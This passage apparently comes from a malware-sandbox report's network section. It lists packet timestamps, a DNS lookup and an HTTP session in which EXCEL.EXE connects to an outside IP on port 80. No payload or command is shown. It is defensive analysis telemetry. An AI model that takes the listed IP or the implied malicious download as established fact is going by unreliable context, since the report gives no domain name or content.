Apr 7, 2021 05:54:07.884072065 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884110928 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884160995 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884180069 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884197950 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884208918 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884212017 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884239912 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884244919 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884279966 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884288073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884320021 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884332895 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884402037 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.893683910 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045336962 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045422077 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045439959 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045598984 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045603991 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045627117 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045644045 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045715094 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045787096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045804024 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045819998 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045836926 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045852900 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045866966 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045870066 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045893908 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045927048 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045964003 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045980930 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045998096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046015978 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046041012 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046063900 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046128988 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046145916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046161890 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046179056 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046183109 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046219110 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.048851013 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.206753016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206813097 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206845999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206876993 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.207096100 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.208825111 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.208884001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.208992004 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209228992 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209273100 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209276915 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209287882 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209312916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209328890 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209352970 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209372044 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209403038 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209481001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209527016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209546089 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209574938 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209577084 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209619999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209634066 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209660053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209666967 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209713936 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209717035 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209757090 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209773064 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209796906 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209813118 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209836006 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209850073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209877014 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209889889 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209914923 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209930897 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209964037 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209969997 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210005999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210026026 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210046053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210057974 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210087061 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210103035 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210128069 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:54:07.238785028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 05:54:07.251486063 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 05:54:07.238785028 CEST | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 05:54:07.251486063 CEST | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 05:54:07.430265903 CEST | 0 | OUT | |
Apr 7, 2021 05:54:07.883936882 CEST | 2 | IN | |